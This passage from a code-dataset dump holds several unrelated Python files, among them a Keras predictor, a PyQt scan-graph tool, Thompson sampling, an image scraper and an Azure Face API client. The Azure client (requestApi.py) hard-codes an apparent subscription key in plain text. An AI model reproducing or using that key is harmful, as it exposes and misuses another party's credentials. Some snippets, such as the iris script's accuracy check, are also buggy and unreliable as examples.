model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.25))\n\n model.add(Conv2D(64,(3,3), padding='same'))\n model.add(Activation('relu'))\n model.add(Conv2D(64,(3,3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.25))\n\n model.add(Flatten())\n model.add(Dense(512))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(3))\n model.add(Activation('softmax'))\n\n opt = keras.optimizers.RMSprop(lr=0.0001, decay=1e-6)\n\n model.compile(loss='categorical_crossentropy', \\\n optimizer=opt, metrics=['accuracy'])\n\n model = load_model('./animal_cnn_plus.h5')\n\n return model\n\ndef main():\n im = Image.open(sys.argv[1])\n im = im.convert('RGB')\n im = im.resize(image_size)\n data = np.asarray(im)\n X = []\n X.append(data)\n X = np.array(X)\n model = build_model()\n\n result = model.predict([X])[0]\n predicted = result.argmax()\n percentage = int(result[predicted] * 100)\n print('{0} ({1} %)'.format(classes[predicted], percentage))\n\nif __name__ == '__main__':\n main()\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"233326768","text":"import logging\nimport time\nfrom typing import Union, List, Optional\n\nimport numpy as np\nfrom PyQt5 import QtWidgets, QtCore, QtGui\nfrom matplotlib.axes import Axes\nfrom matplotlib.backend_bases import key_press_handler, KeyEvent\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT, FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\nfrom matplotlib.lines import Line2D\nfrom sastool.misc.basicfit import findpeak_single, findpeak_asymmetric\n\nfrom .scangraph_ui import Ui_MainWindow\nfrom .signalsmodel import SignalModel\nfrom ..plotimage import PlotImage\nfrom ...core.mixins import ToolWindow\nfrom ....core.devices import Motor\nfrom ....core.instrument.instrument import Instrument\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass ScanGraph(QtWidgets.QMainWindow, Ui_MainWindow, ToolWindow):\n def __init__(self, *args, **kwargs):\n credo = kwargs.pop('credo')\n QtWidgets.QMainWindow.__init__(self, *args, **kwargs)\n self.setupToolWindow(credo)\n self._data = None\n self._lastpeakposition = None\n self.setupUi(self)\n\n def setupUi(self, MainWindow):\n Ui_MainWindow.setupUi(self, MainWindow)\n self.figure = Figure()\n self.canvas = FigureCanvasQTAgg(self.figure)\n self.figureLayout.insertWidget(0, self.canvas)\n self.canvas.setSizePolicy(\n QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding))\n self.figuretoolbar = NavigationToolbar2QT(self.canvas, self.centralWidget())\n self.canvas.mpl_connect('key_press_event', self.onCanvasKeyPress)\n self.canvas.setFocusPolicy(QtCore.Qt.ClickFocus)\n self.figureLayout.insertWidget(0, self.figuretoolbar)\n self.axes = self.figure.add_subplot(1, 1, 1)\n self.axes.grid(True, which='both')\n self._curvehandles = []\n self.cursorLeftButton.clicked.connect(\n lambda: self.cursorSlider.triggerAction(self.cursorSlider.SliderSingleStepSub))\n self.cursorRightButton.clicked.connect(\n lambda: self.cursorSlider.triggerAction(self.cursorSlider.SliderSingleStepAdd))\n self.cursorHomeButton.clicked.connect(\n lambda: self.cursorSlider.triggerAction(self.cursorSlider.SliderToMinimum))\n self.cursorEndButton.clicked.connect(lambda: self.cursorSlider.triggerAction(self.cursorSlider.SliderToMaximum))\n self.cursorSlider.valueChanged.connect(self.cursorMoved)\n self.actionCursor_to_Maximum.triggered.connect(self.cursorToMaximum)\n self.actionCursor_to_Minimum.triggered.connect(self.cursorToMinimum)\n self.actionFit_negative_Gaussian.triggered.connect(lambda: self.fit('Gaussian', -1))\n self.actionFit_positive_Gaussian.triggered.connect(lambda: self.fit('Gaussian', +1))\n self.actionFit_negative_Lorentzian.triggered.connect(lambda: self.fit('Lorentzian', -1))\n self.actionFit_positive_Lorentzian.triggered.connect(lambda: self.fit('Lorentzian', +1))\n self.actionFit_asymmetric_negative_peak.triggered.connect(lambda: self.fit('Lorentzian', -1, True))\n self.actionFit_symmetric_negative_peak.triggered.connect(lambda: self.fit('Lorentzian', -1, False))\n self.actionFit_asymmetric_peak.triggered.connect(lambda: self.fit('Lorentzian', 1, True))\n self.actionFit_symmetric_peak.triggered.connect(lambda: self.fit('Lorentzian', 1, False))\n self.actionAutoScale.toggled.connect(self.autoscale)\n self.actionShowLegend.toggled.connect(self.drawLegend)\n self.hideAllButton.clicked.connect(lambda: self.model.setVisible(None, False))\n self.showAllButton.clicked.connect(lambda: self.model.setVisible(None, True))\n self.actionReplot.triggered.connect(self.replot)\n self.actionMotor_to_peak.setEnabled(False)\n self.actionMotor_to_cursor.setEnabled(True)\n self.actionMotor_to_peak.triggered.connect(self.onMotorToPeak)\n self.actionMotor_to_cursor.triggered.connect(self.onMotorToCursor)\n self.actionShow_2D.toggled.connect(self.replot)\n self.setCursorRange()\n self.canvas.setFocus(QtCore.Qt.OtherFocusReason)\n self.canvas.mpl_connect('resize_event', self.onCanvasResize)\n\n self.signalsTreeView\n\n def onCanvasResize(self, event):\n self.figure.tight_layout()\n self.canvas.draw()\n\n def onCanvasKeyPress(self, event:KeyEvent):\n logger.debug('Key pressed on canvas: {}'.format(event.key))\n if event.key == 'left':\n self.cursorSlider.triggerAction(self.cursorSlider.SliderSingleStepSub)\n elif event.key == 'right':\n self.cursorSlider.triggerAction(self.cursorSlider.SliderSingleStepAdd)\n elif event.key in ['shift+left', 'pagedown']:\n self.cursorSlider.triggerAction(self.cursorSlider.SliderPageStepSub)\n elif event.key in ['shift+right', 'pageup']:\n self.cursorSlider.triggerAction(self.cursorSlider.SliderPageStepAdd)\n else:\n key_press_handler(event, self.canvas, self.figuretoolbar)\n return True\n\n def fit(self, functiontype, sign, asymmetric=False):\n xmin, xmax, ymin, ymax = self.axes.axis()\n x = self._data[self.abscissaName()]\n y = self._data[self.selectedSignal()]\n idx = np.logical_and(np.logical_and(x >= xmin, x <= xmax),\n np.logical_and(y >= ymin, y <= ymax))\n if idx.sum() < 5:\n QtWidgets.QMessageBox.critical(\n self, \"Fitting error\",\n \"Error while peak fitting: not enough points in the current view \"\n \"from the currently selected signal ({})\".format(self.selectedSignal()))\n return\n return_x = np.linspace(x.min(), x.max(), 1000)\n if asymmetric:\n if sign>0:\n pos, hwhm1, hwhm2, baseline, amplitude, yfit = findpeak_asymmetric(x[idx], y[idx], np.ones_like(y[idx]), curve=functiontype, return_x=return_x)\n else:\n pos, hwhm1, hwhm2, baseline, amplitude, yfit = findpeak_asymmetric(x[idx], -y[idx], np.ones_like(y[idx]), curve=functiontype, return_x=return_x)\n yfit = -yfit\n baseline = -baseline\n amplitude = -amplitude\n else:\n pos, hwhm, baseline, amplitude, yfit = findpeak_single(x[idx], y[idx], curve=functiontype, signs=(sign,), return_x=return_x)\n for attr in ['_fitcurvehandle', '_peaktexthandle']:\n try:\n getattr(self, attr).remove()\n delattr(self, attr)\n except AttributeError:\n pass\n self._fitcurvehandle = self.axes.plot(return_x, yfit, 'r--')[0]\n if sign < 0:\n va = 'top'\n if sign > 0:\n va = 'bottom'\n self._peaktexthandle = self.axes.text(float(pos), float(baseline) + float(amplitude), pos.tostring(), ha='center', va=va)\n self._lastpeakposition = pos\n self.actionMotor_to_peak.setEnabled(True)\n self.canvas.draw_idle()\n\n def drawLegend(self):\n if self.actionShowLegend.isChecked():\n handles = [c for c in self._curvehandles if self.model.visible(c.get_label())]\n labels = [c.get_label() for c in handles]\n self.axes.legend(handles, labels, loc='best')\n else:\n self.axes.legend().remove()\n self.canvas.draw_idle()\n\n def autoscale(self):\n self.axes.autoscale(self.actionAutoScale.isChecked(), tight=True)\n if self.actionAutoScale.isChecked():\n self.axes.relim(True)\n self.axes.autoscale_view(True, True, True)\n self.figuretoolbar.update()\n self.canvas.draw_idle()\n\n def cursorToMaximum(self):\n self.cursorSlider.setValue(np.argmax(self._data[self.selectedSignal()]))\n\n def cursorToMinimum(self):\n self.cursorSlider.setValue(np.argmin(self._data[self.selectedSignal()]))\n\n def selectedSignal(self):\n return self._data.dtype.names[1:][self.signalsTreeView.selectionModel().selectedRows()[0].row()]\n\n def signalsTreeViewSelectionChanged(self, current: QtCore.QModelIndex,\n previous: QtCore.QModelIndex):\n for h in self._curvehandles:\n h.set_lw(1)\n self._curvehandles[current.row()].set_lw(3)\n self.drawLegend()\n self.canvas.draw_idle()\n\n def cursorMoved(self, position):\n self.cursorLeftButton.setEnabled(position > 0)\n self.cursorRightButton.setEnabled(position < self._datalength - 1)\n self.cursorHomeButton.setEnabled(position > 0)\n self.cursorEndButton.setEnabled(position < self._datalength - 1)\n try:\n self.actionMotor_to_cursor.setEnabled(not self.credo.motors[self.abscissaName()].ismoving())\n except KeyError:\n self.actionMotor_to_cursor.setEnabled(False)\n self.draw2D()\n self.drawScanCursor()\n\n def drawScanCursor(self):\n if self.isScanRunning():\n return False\n assert isinstance(self.axes, Axes)\n cursorposition = self.cursorSlider.value()\n if hasattr(self, '_cursorhandle'):\n self._cursorhandle.remove()\n del self._cursorhandle\n self._cursorhandle = self.axes.axvline(self._data[self.abscissaName()][cursorposition], color='black',\n alpha=0.8, lw=3)\n self.cursorPositionLabel.setText('{:.4f}'.format(self._data[self.abscissaName()][cursorposition]))\n self.requestRedraw()\n\n def replot(self):\n t0 = time.monotonic()\n if self._data is None:\n return False\n assert isinstance(self._data, np.ndarray)\n # self.axes.set_color_cycle(None)\n if hasattr(self, '_fitcurvehandle'):\n self._fitcurvehandle.remove()\n del self._fitcurvehandle\n if hasattr(self, '_peaktexthandle'):\n self._peaktexthandle.remove()\n del self._peaktexthandle\n if not hasattr(self, '_curvehandles'):\n self._curvehandles = []\n if not self._curvehandles:\n for signal in self._data.dtype.names[1:]:\n self._curvehandles.extend(\n self.axes.plot(self._data[self.abscissaName()][:self._datalength],\n self._data[signal][:self._datalength], '.-', label=signal))\n else:\n abscissaname = self.abscissaName()\n abscissa = self._data[abscissaname][:self._datalength]\n for signal, handle in zip(self._data.dtype.names[1:], self._curvehandles):\n handle.set_xdata(abscissa)\n handle.set_ydata(self._data[signal][:self._datalength] * self.model.factor(signal))\n handle.set_lw(1)\n try:\n self._curvehandles[self.signalsTreeView.selectedIndexes()[0].row()].set_lw(3)\n except IndexError:\n pass\n self.autoscale()\n self.drawLegend()\n self.drawScanCursor()\n self.draw2D()\n self.requestRedraw()\n\n def setCurvesVisibility(self):\n for c in self._curvehandles:\n assert isinstance(c, Line2D)\n c.set_visible(self.model.visible(c.get_label()))\n self.drawLegend()\n self.autoscale()\n self.requestRedraw()\n\n def updateCursorVisibility(self):\n for widget in [self.cursorEndButton, self.cursorHomeButton, self.cursorLeftButton,\n self.cursorRightButton, self.cursorSlider, self.cursorPositionLabel]:\n widget.setEnabled(self._data is not None)\n widget.setVisible(self._data is not None)\n\n def setCursorRange(self):\n self.updateCursorVisibility()\n if self._data is None:\n return\n self.cursorSlider.setMinimum(0)\n self.cursorSlider.setMaximum(self._datalength - 1)\n self.cursorSlider.setValue((self._datalength - 1) // 2)\n\n def setCurve(self, scandata: Union[np.ndarray, List[str]], datalength: Optional[int] = None):\n \"\"\"Set the scan data.\n\n Inputs:\n scandata: np.ndarray or a list of strings.\n A one-dimensional, structured numpy array. The field names are\n the labels of the individual signals. The first field is the\n abscissa. If a list of strings, an empty array will be constructed\n containing space for `datalength` points.\n datalength: positive integer\n The expected length of the data. If None, it will be set to the\n number of elements in scandata.\n If this instance of ScanGraph is meant to represent a scan\n currently in progress, scandata must be an array with enough\n space to fit all scan points acquired during the measurement,\n and datalength must be the number of already acquired points,\n zero if the scan has just been started and no point has been\n recorded yet. `datalength > len(scandata)` is an error.\n \"\"\"\n if not isinstance(scandata, np.ndarray):\n logger.debug(scandata)\n logger.debug(datalength)\n scandata = np.zeros(datalength, dtype=list(zip(scandata, [np.double] * len(scandata))))\n datalength = 0\n if datalength is None:\n datalength = len(scandata)\n if datalength > len(scandata):\n raise ValueError(\n 'Argument `datalength` must not be larger than the number of points in argument `scandata`.')\n self._data = scandata\n self._datalength = datalength\n self.axes.set_xlabel(self.abscissaName())\n self.setCursorRange()\n self.model = SignalModel(signals=self._data.dtype.names[1:])\n self.signalsTreeView.setModel(self.model)\n self.model.dataChanged.connect(self.signalsTreeModelChanged)\n self.signalsTreeView.selectionModel().currentChanged.connect(self.signalsTreeViewSelectionChanged)\n self.signalsTreeView.selectionModel().select(self.model.index(1, 0),\n QtCore.QItemSelectionModel.SelectCurrent | QtCore.QItemSelectionModel.Rows)\n for col in range(self.signalsTreeView.model().columnCount()):\n self.signalsTreeView.resizeColumnToContents(col)\n self.setCursorRange()\n self.replot()\n self.setCurvesVisibility()\n\n def signalsTreeModelChanged(self, idxfrom: QtCore.QModelIndex, idxto: QtCore.QModelIndex):\n for col in range(self.signalsTreeView.model().columnCount()):\n self.signalsTreeView.resizeColumnToContents(col)\n if idxfrom.column() == 0 or idxto.column() == 0:\n self.setCurvesVisibility()\n if idxfrom.column() == 1 or idxto.column() == 1:\n self.replot()\n return True\n\n def appendScanPoint(self, scanpoint):\n \"\"\"Append a newly acquired scan point.\n\n Inputs:\n scanpoint: tuple\n A tuple carrying the newly registered values for all signals,\n including the abscissa.\"\"\"\n if self._datalength >= len(self._data):\n raise ValueError('Cannot append to scan curve: no space left in the array.')\n self._data[self._datalength] = scanpoint\n self._datalength += 1\n if not self.isScanRunning():\n self.truncateScan()\n self.replot()\n\n def truncateScan(self):\n \"\"\"Remove unused space from the data array, thus considering this scan\n finished.\n \"\"\"\n self._data = self._data[:self._datalength]\n self.setCursorRange()\n if self.credo is not None:\n assert isinstance(self.credo, Instrument)\n try:\n motor = self.credo.motors[self.abscissaName()]\n assert isinstance(motor, Motor)\n except KeyError:\n pass\n else:\n self.actionMotor_to_cursor.setEnabled(not motor.ismoving())\n self.actionMotor_to_peak.setEnabled((not motor.ismoving()) and (self._lastpeakposition is not None))\n self.requireDevice('Motor_' + self.abscissaName())\n\n def onMotorStart(self, motor: Motor):\n self.actionMotor_to_cursor.setEnabled(False)\n self.actionMotor_to_peak.setEnabled(False)\n\n def onMotorStop(self, motor: Motor, targetpositionreached: bool):\n self.actionMotor_to_cursor.setEnabled(True)\n self.actionMotor_to_peak.setEnabled(self._lastpeakposition is not None)\n\n def cleanup(self):\n logger.debug('Cleaning up scangraph {}'.format(self.windowTitle()))\n del self._data\n super().cleanup()\n\n def abscissaName(self):\n return self._data.dtype.names[0]\n\n def isScanRunning(self):\n return self._datalength < len(self._data)\n\n def __len__(self):\n return self._datalength\n\n def requestRedraw(self):\n self.canvas.draw_idle()\n\n def onMotorToPeak(self):\n motor = self.credo.motors[self.abscissaName()]\n assert isinstance(motor, Motor)\n try:\n motor.moveto(self._lastpeakposition.val)\n except Exception as exc:\n QtWidgets.QMessageBox.critical(self, 'Cannot move motor',\n 'Cannot move motor {}: {}'.format(self.abscissaName(), exc.args[0]))\n\n def onMotorToCursor(self):\n motor = self.credo.motors[self.abscissaName()]\n assert isinstance(motor, Motor)\n try:\n motor.moveto(self._data[self.abscissaName()][self.cursorSlider.value()])\n except Exception as exc:\n QtWidgets.QMessageBox.critical(self, 'Cannot move motor',\n 'Cannot move motor {}: {}'.format(self.abscissaName(), exc.args[0]))\n\n def draw2D(self):\n if not self.actionShow_2D.isChecked():\n return\n plot2d = PlotImage.get_lastinstance()\n plot2d.show()\n if len(self._data) == self._datalength:\n cursor = self.cursorSlider.value()\n else:\n cursor = self._datalength - 1\n if cursor < 0:\n return\n fsn = self._data['FSN'][cursor]\n exp = self.credo.services['filesequence'].load_exposure(self.credo.config['path']['prefixes']['scn'], int(fsn))\n plot2d.setExposure(exp)\n\n def closeEvent(self, event: QtGui.QCloseEvent):\n if self.isScanRunning():\n msg = QtWidgets.QMessageBox.warning(\n self, 'Confirm close window',\n 'A scan measurement is still running. Do you really want to close the window?',\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No\n )\n if msg == QtWidgets.QMessageBox.YesRole:\n ToolWindow.closeEvent(self, event)\n else:\n event.ignore()\n return ToolWindow.closeEvent(self, event)\n","sub_path":"cct/qtgui/core/scangraph/scangraph.py","file_name":"scangraph.py","file_ext":"py","file_size_in_byte":18930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"9102551","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 19 23:42:19 2020\n\n@author: jcantero\n\"\"\"\n\n# Muestro Thompson (UCB)\n\n# Importar las librerías\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Cargar el dataset\ndataset = pd.read_csv(\"Ads_CTR_Optimisation.csv\")\n\n# Algoritmo de UCB\nimport random\nN = 10000\nd = 10\n\nnumberOfRewards1 = [0] * d\nnumberOfRewards0 = [0] * d\n\n# Anuncio seleccionado\nadsSelected = [] \n\ntotalReward = 0;\n\nfor n in range(0, N):\n maxRandom = 0\n ad = 0\n \n for i in range(0, d):\n randomBeta = random.betavariate(numberOfRewards1[i] + 1, numberOfRewards0[i] + 1)\n \n if randomBeta > maxRandom:\n maxRandom = randomBeta\n ad = i\n \n adsSelected.append(ad)\n \n \n reward = dataset.values[n, ad]\n if reward == 1:\n numberOfRewards1[ad] = numberOfRewards1[ad] + 1;\n else:\n numberOfRewards0[ad] = numberOfRewards0[ad] + 1;\n \n totalReward = totalReward + reward\n \n# Histograma de resultados\nplt.hist(adsSelected)\nplt.title(\"Histograma de anuncios\")\nplt.xlabel(\"ID del Anuncio\")\nplt.ylabel(\"Frecuencia de visualización del anuncio\")\nplt.show()\n","sub_path":"datasets/Part 6 - Reinforcement Learning/Section 33 - Thompson Sampling/thompson_sampling_jcantero.py","file_name":"thompson_sampling_jcantero.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"428192959","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 13 18:36:41 2014\n\n@author: favi\n\"\"\"\n\nimport math\n\nfrom PyQt4 import QtCore, QtGui\n\n\nclass FsmTransition(QtGui.QGraphicsLineItem):\n def __init__(self, startItem, endItem, parent=None, scene=None):\n super(FsmTransition, self).__init__(parent, scene)\n\n self.arrowHead = QtGui.QPolygonF()\n\n self.myStartItem = startItem\n self.myEndItem = endItem\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable, True)\n self.myColor = QtCore.Qt.black\n self.setPen(QtGui.QPen(self.myColor, 1, QtCore.Qt.SolidLine,\n QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin))\n\n def setColor(self, color):\n self.myColor = color\n\n def startItem(self):\n return self.myStartItem\n\n def endItem(self):\n return self.myEndItem\n\n def boundingRect(self):\n extra = (self.pen().width() + 20) / 2.0\n p1 = self.line().p1()\n p2 = self.line().p2()\n return QtCore.QRectF(p1, QtCore.QSizeF(p2.x() - p1.x(), p2.y() - p1.y())).normalized().adjusted(-extra, -extra, extra, extra)\n\n def shape(self):\n path = super(FsmTransition, self).shape()\n path.addPolygon(self.arrowHead)\n return path\n\n def updatePosition(self):\n# line = QtCore.QLineF(self.mapFromItem(self.myStartItem, 0, 0), \n# self.mapFromItem(self.myEndItem, 0, 0))\n line = QtCore.QLineF(self.myStartItem.pos(), \n self.myEndItem.pos()) \n self.setLine(line)\n self.update(self.boundingRect())\n\n def paint(self, painter, option, widget=None):\n if (self.myStartItem.collidesWithItem(self.myEndItem)):\n return\n\n myStartItem = self.myStartItem\n myEndItem = self.myEndItem\n myColor = self.myColor\n myPen = self.pen()\n myPen.setColor(self.myColor)\n arrowSize = 20.0\n \n painter.setPen(myPen)\n painter.setBrush(self.myColor)\n\n centerLine = QtCore.QLineF(myStartItem.pos(), myEndItem.pos())\n uv = centerLine.unitVector() \n endPos = myEndItem.pos()-QtCore.QPointF(uv.dx()*myEndItem.diameter/2, uv.dy()*myEndItem.diameter/2)\n \n # endPolygon = myEndItem.polygon()\n # p1 = endPolygon.first() + myEndItem.pos()\n\n # intersectPoint = QtCore.QPointF()\n # for i in endPolygon:\n # p2 = i + myEndItem.pos()\n # polyLine = QtCore.QLineF(p1, p2)\n # intersectType = polyLine.intersect(centerLine, intersectPoint)\n # if intersectType == QtCore.QLineF.BoundedIntersection:\n # break\n # p1 = p2\n \n #self.setLine(QtCore.QLineF(intersectPoint, myStartItem.pos()))\n self.setLine(QtCore.QLineF(endPos, myStartItem.pos()))\n #self.setLine(centerLine)\n line = self.line()\n \n \n # \n# angle = math.acos(line.dx() / line.length())\n# if line.dy() >= 0:\n# angle = (math.pi * 2.0) - angle\n# arrowAperture = math.pi/3.0 #angle \n# arrowP1 = line.p1() + QtCore.QPointF(math.sin(angle + arrowAperture) * arrowSize,\n# math.cos(angle + arrowAperture) * arrowSize)\n# arrowC1 = line.p1() - QtCore.QPointF(uv.dx()*arrowSize/2, uv.dy()*arrowSize/2) \n# arrowP2 = line.p1() + QtCore.QPointF(math.sin(angle + math.pi - arrowAperture) * arrowSize,\n# math.cos(angle + math.pi - arrowAperture) * arrowSize)\n \n angle = line.angle() #in degrees\n arrowAperture = 20 #degrees \n arrowP1 = QtCore.QLineF.fromPolar(arrowSize,angle+arrowAperture).translated(line.p1()).p2() \n arrowC1 = QtCore.QLineF.fromPolar(arrowSize/2,angle).translated(line.p1()).p2() \n arrowP2 = QtCore.QLineF.fromPolar(arrowSize,angle-arrowAperture).translated(line.p1()).p2()\n\n self.arrowHead.clear()\n for point in [line.p1(), arrowP1, arrowC1, arrowP2]:\n self.arrowHead.append(point)\n\n painter.drawLine(line)\n painter.drawPolygon(self.arrowHead)\n if self.isSelected():\n painter.setPen(QtGui.QPen(myColor, 1, QtCore.Qt.DashLine))\n myLine = QtCore.QLineF(line)\n myLine.translate(0, 4.0)\n painter.drawLine(myLine)\n myLine.translate(0,-8.0)\n painter.drawLine(myLine)\n \nif __name__ == '__main__':\n import sys\n from MainWindow import MainWindow\n from PyQt4.QtTest import QTest\n from PyQt4.QtCore import Qt\n \n app = QtGui.QApplication(sys.argv)\n\n\n mainWindow = MainWindow()\n mainWindow.setGeometry(100, 100, 800, 500)\n mainWindow.show()\n\n QTest.mouseClick(mainWindow.addStateButton, Qt.LeftButton)\n QTest.mouseClick(mainWindow.view.viewport(), Qt.LeftButton, Qt.NoModifier, QtCore.QPoint(400,200))\n QTest.mouseClick(mainWindow.view.viewport(), Qt.LeftButton, Qt.NoModifier, QtCore.QPoint(100,250))\n QTest.mouseClick(mainWindow.linePointerButton, Qt.LeftButton)\n QTest.mousePress(mainWindow.view.viewport(), Qt.LeftButton, Qt.NoModifier, QtCore.QPoint(400,200))\n QTest.mouseMove(mainWindow.view.viewport(), QtCore.QPoint(100,250))\n QTest.mouseRelease(mainWindow.view.viewport(), Qt.LeftButton, Qt.NoModifier, QtCore.QPoint(100,250))\n \n sys.exit(app.exec_()) ","sub_path":"FsmTransition.py","file_name":"FsmTransition.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"404923793","text":"\nfrom bs4 import BeautifulSoup\nfrom urllib import request\nfrom urllib import parse\n\nimport sys,io,os\n\n\n\nsort=input('다운로드받고자 하는 이미지는')\n\nurl='https://search.naver.com/search.naver?sm=tab_hty.top&where=image&query='\n\n#print(var)\nparse_quote = parse.quote(sort)\n\n#print(parse_quote)\n\n\nimg_url= url+parse_quote\n\n\nsavePath='D:\\\\pythonProject\\\\project\\\\day20190518\\\\img\\\\' +sort +'\\\\'\n\ntry:\n os.makedirs(savePath)\nexcept:\n print('Fail')\n\n\nhtml=request.urlopen(img_url).read() ##해당되는 전체 Tage를 읽기 위해서 실행함\n\n#print(html)\n\nsoup = BeautifulSoup(html,'html.parser')\n\n#print(soup) ##요건 주석풀면 에러남\n\nlist=soup.find_all('img', class_='_img')\n#print(list)\n#print(list[0])\n#print(len(list))\n\nfor idx, img in enumerate(list,1):\n print(img['data-source']) ## 이미지의 각 주소\n saveName=savePath + sort + str(idx) + '.png'\n #print(saveName)\n\n request.urlretrieve(img['data-source'],saveName) ## 파일마다 각 주소를 찾아가서 저장해라\n\n\nprint('success!!!!')\n","sub_path":"8/downloadEx03_1.py","file_name":"downloadEx03_1.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"202881426","text":"import os, requests\nfrom azure.cognitiveservices.vision.face import FaceClient\nfrom msrest.authentication import CognitiveServicesCredentials\n\n\nheaders = {\n 'Ocp-Apim-Subscription-Key': '16287767a9cc49e2a3367b0225e2d2bd',\n}\n\nKEY = '16287767a9cc49e2a3367b0225e2d2bd'\n\nENDPOINT = 'https://testproj.cognitiveservices.azure.com/'\n\n\ndef detectedFace(image):\n face_client = FaceClient(ENDPOINT, CognitiveServicesCredentials(KEY))\n\n faces_on_image = []\n\n single_face_image_url = image\n single_image_name = os.path.basename(single_face_image_url)\n detected_faces = face_client.face.detect_with_url(url=single_face_image_url)\n if not detected_faces:\n raise Exception('No face detected from image {}'.format(single_image_name))\n \n for face in detected_faces:\n faces_on_image.append(face.face_id)\n\n return faces_on_image\n\n\ndef createPersonGroup(name, userData, personGroupId):\n body = dict()\n body[\"name\"] = name\n body[\"userData\"] = userData\n body = str(body)\n print(body)\n #Request URL \n\n FaceApiCreateLargePersonGroup = 'https://testproj.cognitiveservices.azure.com/face/v1.0/persongroups/'+personGroupId \n try:\n response = requests.put(FaceApiCreateLargePersonGroup, data=body, headers=headers) \n return response.status_code\n\n\n except Exception as e:\n return e\n\n\ndef createPerson(name, userData, personGroupId):\n body = dict()\n body[\"name\"] = name\n body[\"userData\"] = userData\n body = str(body)\n\n #Request URL \n FaceApiCreatePerson = ENDPOINT+'face/v1.0/persongroups/'+personGroupId+'/persons'\n\n try:\n # REST Call \n response = requests.post(FaceApiCreatePerson, data=body, headers=headers) \n responseJson = response.json()\n personId = responseJson\n return personId\n \n except Exception as e:\n return e\n\n\ndef addImageForPerson(personId, personGroupId, imgURL):\n FaceApiAddFace = ENDPOINT+'face/v1.0/persongroups/'+personGroupId+'/persons/'+personId+'/persistedFaces'\n\n body = dict()\n body[\"url\"] = imgURL\n body = str(body)\n\n try:\n # REST Call \n response = requests.post(FaceApiAddFace, data=body, headers=headers) \n responseJson = response.json()\n persistedFaceId = responseJson[\"persistedFaceId\"]\n print(\"PERSISTED FACE ID: \"+str(persistedFaceId))\n return persistedFaceId\n \n except Exception as e:\n return e\n\n\ndef identifyPerson(image, groupId):\n faceIdsList = detectedFace(image)\n FaceApiIdentify = ENDPOINT+'face/v1.0/identify'\n\n body = dict()\n body[\"personGroupId\"] = groupId\n body[\"faceIds\"] = faceIdsList\n body = str(body)\n\n try:\n # REST Call\n response = requests.post(FaceApiIdentify, data=body, headers=headers) \n responseJson = response.json()\n print(responseJson)\n personId = responseJson[0][\"candidates\"][0][\"personId\"]\n confidence = responseJson[0][\"candidates\"][0][\"confidence\"]\n \n person = getPerson(personId, groupId)\n return person\n\n except Exception:\n return 'Could not detect'\n\n\ndef trainPersonGroup(groupId):\n body = dict()\n\n #Request URL \n FaceApiTrain = ENDPOINT+'face/v1.0/persongroups/'+groupId+'/train'\n\n try:\n # REST Call \n response = requests.post(FaceApiTrain, data=body, headers=headers) \n return response.status_code\n\n except Exception as e:\n return e\n\n\ndef getPerson(personId, personGroupId):\n getPersonApi = 'https://testproj.cognitiveservices.azure.com/face/v1.0/persongroups/'+personGroupId+'/persons/'+personId\n\n try:\n response = requests.get(getPersonApi, headers=headers)\n responseJson = response.json()\n print(responseJson)\n return responseJson\n except Exception as e:\n return e\n\n\ndef getGroups():\n getGroupsApi = ENDPOINT+'face/v1.0/persongroups/'\n\n try:\n response = requests.get(getGroupsApi, headers=headers)\n return response.json()\n\n except Exception as e:\n return e","sub_path":"requestApi.py","file_name":"requestApi.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"620474894","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\n\ndf = pd.read_csv(\"http://archive.ics.uci.edu/ml/machine-learning-databases/iris/bezdekIris.data\",\nnames = [\"Sepal Length\", \"Sepal Width\", \"Petal Length\", \"Petal Width\", \"Class\"])\n\nprint(df.head(10))\n\ndf.hist(bins=20)\n\ndata_array=df.values\nnp.random.shuffle(data_array)\nx = data_array[:80][:,0:4]\ny = data_array[:80][:,4]\n\nsvc=SVC()\nsvc.fit(x,y)\n\nX = data_array[-20:][:,0:4]\nY = data_array[-20:][:,4]\n\npred = svc.predict(X)\nprint(pred)\nper=0\nif print((pred==Y).all()):\n rate=100\nelse:\n for i in range(0,len(Y)):\n if pred[i]==Y[i]:\n per+=1\n\n\n","sub_path":"iris_data.py","file_name":"iris_data.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"52454994","text":"\"\"\"\nClass: Python 2020\nHomework Assignment 3\nAuthor: Jin Kim\n\"\"\"\n\n# Initial Node given in the problem\nclass Node:\n def __init__(self, _value=None, _next=None):\n self.value = _value\n self.next = _next\n def __str__(self):\n return str(self.value)\n\n# help function to translate integer input to node\ndef NodeFromValue(node, value):\n this_node 